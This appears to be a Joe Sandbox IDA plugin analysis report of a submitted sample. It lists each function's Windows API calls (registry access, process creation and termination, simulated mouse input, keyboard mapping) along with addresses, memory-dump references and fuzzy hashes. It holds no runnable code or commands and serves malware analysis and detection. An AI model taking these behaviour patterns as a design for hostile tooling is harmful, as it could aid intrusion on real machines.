Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00469F26
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00469F39
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00469F4C
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00469F5F
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00469F72
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00469F85
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00469F98
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00469FAB
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00469FBE

__mtinitlocks.LIBCMT ref: 00469AEB
__mtterm.LIBCMT ref: 00469AF4

Part of subcall function 00469B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00469AF9,00467CD0,004FA0B8,00000014), ref: 00469C56
Part of subcall function 00469B5C: _free.LIBCMT ref: 00469C5D
Part of subcall function 00469B5C: DeleteCriticalSection.KERNEL32(02P,?,?,00469AF9,00467CD0,004FA0B8,00000014), ref: 00469C7F

__calloc_crt.LIBCMT ref: 00469B19
__initptd.LIBCMT ref: 00469B3B
GetCurrentThreadId.KERNEL32 ref: 00469B42

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: b057b39ccb4fa10b2633f87e6a6f9a0663ddc8adf1d450af93d619ad4e1116b9
Instruction ID: 60245fddc3246542fe561cac541488d47c181dfca3d5deba65fcf86c09177ea1
Opcode Fuzzy Hash: b057b39ccb4fa10b2633f87e6a6f9a0663ddc8adf1d450af93d619ad4e1116b9
Instruction Fuzzy Hash: D4F062325197125AEA647A767C03A9B2799AB02B39B20062FF450C61D2FFF89C41416E

Function 004CB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004CB644
_memset.LIBCMT ref: 004CB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00506F20,00506F64), ref: 004CB682
CloseHandle.KERNEL32 ref: 004CB694

Strings

oP, xrefs: 004CB63E
doP, xrefs: 004CB64D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oP$doP
API String ID: 3277943733-2061560239
Opcode ID: 189bb008f87a5a243807884f41d0be159b717abaf9b57a552e3c1577260fb0b7
Instruction ID: 0b957d59244cde504921e80f941a3034e2a80abb9b1340dd5ab70be45f7e5bea
Opcode Fuzzy Hash: 189bb008f87a5a243807884f41d0be159b717abaf9b57a552e3c1577260fb0b7
Instruction Fuzzy Hash: 04F05EB26403027AE2502761BC06FBF3A9CEB18395F004035BA08E51A6DB795C24D7AD

Function 0046406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00463F85), ref: 00464085
GetProcAddress.KERNEL32(00000000), ref: 0046408C
EncodePointer.KERNEL32(00000000), ref: 00464097
DecodePointer.KERNEL32(00463F85), ref: 004640B2

Strings

combase.dll, xrefs: 00464080
RoUninitialize, xrefs: 00464074

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a613110b2b1984f3ee4a917466001fa59c768740862fb219381ca31115d1e5a5
Instruction ID: de72f2854d225661ac537a67cdf01949f0f0ba01a3cda708f04abe13298fb943
Opcode Fuzzy Hash: a613110b2b1984f3ee4a917466001fa59c768740862fb219381ca31115d1e5a5
Instruction Fuzzy Hash: 0EE09A70581200AFDB509F61ED09B493AAAB768742F204036F501D11A0DBBB460CDA19

Function 004A64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004A660B
_memmove.LIBCMT ref: 004A6546

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

_memmove.LIBCMT ref: 004A65B9
_memmove.LIBCMT ref: 004A66A0
_memmove.LIBCMT ref: 004A66B9
_memmove.LIBCMT ref: 004A66D5

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 96d792e38c76c4facbdde67addef648add14df66bc1d221183d54a23a2e9edca
Instruction ID: 3cba707f096b2bb1feea34bc84cd1ee85ef3d6950416b717cb14cd3be49517ed
Opcode Fuzzy Hash: 96d792e38c76c4facbdde67addef648add14df66bc1d221183d54a23a2e9edca
Instruction Fuzzy Hash: C661CD3090025A9BDF11EF65CC82AFF37A5AF56308F09451EF8156B292EB39DC02DB59

Function 004C01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 004C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004BFDAD,?,?), ref: 004C0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004C02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004C02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004C0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004C0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 004C038C
RegCloseKey.ADVAPI32(00000000), ref: 004C0399

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 8d70e6c68d384839d401f3fdd74e1d36e0b4045356a0049fd072f7102092212c
Instruction ID: bed7d0966e7686ba724277b7bdc1a760b3a2c4a3abbb5a4ef8be2f2c30e292e3
Opcode Fuzzy Hash: 8d70e6c68d384839d401f3fdd74e1d36e0b4045356a0049fd072f7102092212c
Instruction Fuzzy Hash: A8517B75108240AFD750EF55C885E6FBBE9FF84318F00492EF845872A2DB39E905CB56

Function 004C5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004C57FB
GetMenuItemCount.USER32(00000000), ref: 004C5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004C585A
GetMenuItemID.USER32(?,?), ref: 004C58C9
GetSubMenu.USER32(?,?), ref: 004C58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 004C5928

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 322251cfbf3425eccc5df0545107b2de9f0ac1a0610c72bdfe1235752eb72202
Instruction ID: d4a4c9f4f0874a0d3b1cd89291681eb021afc3f3b5c813636b8d910b0fef8d24
Opcode Fuzzy Hash: 322251cfbf3425eccc5df0545107b2de9f0ac1a0610c72bdfe1235752eb72202
Instruction Fuzzy Hash: EA516E75E00615AFCF51EF65C845EAEB7B5EF48310F10406AE801BB351DB78BE818B99

Function 0049EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0049EF06
VariantClear.OLEAUT32(00000013), ref: 0049EF78
VariantClear.OLEAUT32(00000000), ref: 0049EFD3
_memmove.LIBCMT ref: 0049EFFD
VariantClear.OLEAUT32(?), ref: 0049F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0049F078

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: bcd15a74924e68fb84ca8f20764c98b004a88345abd4f4f6cd6a208d126b1640
Instruction ID: 8f8293aa76e909ed47a41182ece21f11a167283158a5c7dbe49cea0cdf06aab0
Opcode Fuzzy Hash: bcd15a74924e68fb84ca8f20764c98b004a88345abd4f4f6cd6a208d126b1640
Instruction Fuzzy Hash: B6516D75A00209EFCB14CF58C880AAABBB9FF4C314B15856AED59DB301E335E915CF94

Function 004A220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004A22A3
IsMenu.USER32(00000000), ref: 004A22C3
CreatePopupMenu.USER32 ref: 004A22F7
GetMenuItemCount.USER32(000000FF), ref: 004A2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004A2386

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: f523d210ec9d50cfbe0d599784de2fc2bbe3e2e417104cf63b0c41035167a11b
Instruction ID: ba95dd26765e81097ade90ddb72ab95389ade630bf2d73801d300c9013ae4326
Opcode Fuzzy Hash: f523d210ec9d50cfbe0d599784de2fc2bbe3e2e417104cf63b0c41035167a11b
Instruction Fuzzy Hash: 5951B170600209EBDF25CF7CCA88BAEBBF5AF67318F10416AE81197290D3BD8905DB55

Function 00441765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0044179A
GetWindowRect.USER32(?,?), ref: 004417FE
ScreenToClient.USER32(?,?), ref: 0044181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0044182C
EndPaint.USER32(?,?), ref: 00441876

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 130cec4f45245c145301d0468042b92aba46362fa1aab2650351f67d5ce339b5
Instruction ID: f0d68e70d6497bffef8b1b1d52e47bc565438c7f766438a366fe1b95144f0b0f
Opcode Fuzzy Hash: 130cec4f45245c145301d0468042b92aba46362fa1aab2650351f67d5ce339b5
Instruction Fuzzy Hash: 86419F30100700AFE710EF25C884FBB7BE8EF55724F14862AF994972B1D7389889DB66

Function 004CB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(005057B0,00000000,00AD55B8,?,?,005057B0,?,004CB5A8,?,?), ref: 004CB712
EnableWindow.USER32(00000000,00000000), ref: 004CB736
ShowWindow.USER32(005057B0,00000000,00AD55B8,?,?,005057B0,?,004CB5A8,?,?), ref: 004CB796
ShowWindow.USER32(00000000,00000004,?,004CB5A8,?,?), ref: 004CB7A8
EnableWindow.USER32(00000000,00000001), ref: 004CB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 004CB7EF

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: bb4c67a3d04fc00ad1348c9331f227299ad29121552f3a53ae983f64677a6aff
Instruction ID: e2911dcdace4ed2bb6860ee5901211c8fc6b74e378cb5c9e1da28039a7ba29b9
Opcode Fuzzy Hash: bb4c67a3d04fc00ad1348c9331f227299ad29121552f3a53ae983f64677a6aff
Instruction Fuzzy Hash: 49416238602240AFDB61CF24C49AF957BE1FB45314F1881BEED488F6A2C735A856CB95

Function 004B709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,004B4E41,?,?,00000000,00000001), ref: 004B70AC

Part of subcall function 004B39A0: GetWindowRect.USER32(?,?), ref: 004B39B3

GetDesktopWindow.USER32 ref: 004B70D6
GetWindowRect.USER32(00000000), ref: 004B70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004B710F

Part of subcall function 004A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004A52BC

GetCursorPos.USER32(?), ref: 004B713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004B7199

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 158db12003903b046b7593f2ef96fbf3187c2b47aa968c49957f297db9b76861
Instruction ID: 4747b843470fc20db04209a7f59cd37f5b1237a5d927e76ce9ee0c1e1682cc77
Opcode Fuzzy Hash: 158db12003903b046b7593f2ef96fbf3187c2b47aa968c49957f297db9b76861
Instruction Fuzzy Hash: C431C672509305ABD720DF14C849F9BB7EAFFC9314F00052AF58597291C778EA09CBAA

Function 00498879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004980C0
Part of subcall function 004980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004980CA
Part of subcall function 004980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004980D9
Part of subcall function 004980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004980E0
Part of subcall function 004980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004980F6

GetLengthSid.ADVAPI32(?,00000000,0049842F), ref: 004988CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004988D6
HeapAlloc.KERNEL32(00000000), ref: 004988DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 004988F6
GetProcessHeap.KERNEL32(00000000,00000000,0049842F), ref: 0049890A
HeapFree.KERNEL32(00000000), ref: 00498911

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b8abf2f044848abeab288eedfad6b8dc693a4de272e07e990745ee3834734948
Instruction ID: 07ca0258f7402a30ca8b5807147bfb764792e707131d6e02b6b3a4e4103a95a1
Opcode Fuzzy Hash: b8abf2f044848abeab288eedfad6b8dc693a4de272e07e990745ee3834734948
Instruction Fuzzy Hash: F0118C71501609EFDF109FA9DC09FBF7BA9EB46315F14403EE84597210CB3A9D049B68

Function 004985B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004985E2
OpenProcessToken.ADVAPI32(00000000), ref: 004985E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004985F8
CloseHandle.KERNEL32(00000004), ref: 00498603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00498632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00498646

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: a81dde1f722532e6133987f5f01316eca859c45af9cfbf4633c9a7beeec53a43
Instruction ID: ddb41634a06b642c739015c2ecf1b4631c195cdb1ff8891e652f0c53c66de6e1
Opcode Fuzzy Hash: a81dde1f722532e6133987f5f01316eca859c45af9cfbf4633c9a7beeec53a43
Instruction Fuzzy Hash: 8D116A72101209ABDF018FA8DC48FDA7BA9EB09314F044079FE00A2160C67A9D69DB64

Function 0049B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0049B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0049B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0049B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0049B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0049B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0049B7FE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 36f1e79a827b15efaac691255f9d5f71b71810ca317844e77497ceb0d05712b8
Instruction ID: 6a0a46ac64360a4927ff5e949ce19e2cad87516276cfeb8545c6d37baa27d6b3
Opcode Fuzzy Hash: 36f1e79a827b15efaac691255f9d5f71b71810ca317844e77497ceb0d05712b8
Instruction Fuzzy Hash: 32018475E00209BBEF109BE69D49E5EBFB9EB48711F004076FA04A7391D6349C00CF94

Function 00460162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00460193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0046019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004601A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004601B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 004601B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 004601C1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 0ee0a6308f987c8f25b2bd7ccfcd97fc1301545918588ba87d6cbe13657e78a7
Instruction ID: 702c22df53ff7ea5cbcb17b4725dbc602df5ab6a1fae0144610591d1ca814096
Opcode Fuzzy Hash: 0ee0a6308f987c8f25b2bd7ccfcd97fc1301545918588ba87d6cbe13657e78a7
Instruction Fuzzy Hash: 62016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5

Function 004A53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004A53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004A540F
GetWindowThreadProcessId.USER32(?,?), ref: 004A541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004A542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004A5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004A543E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
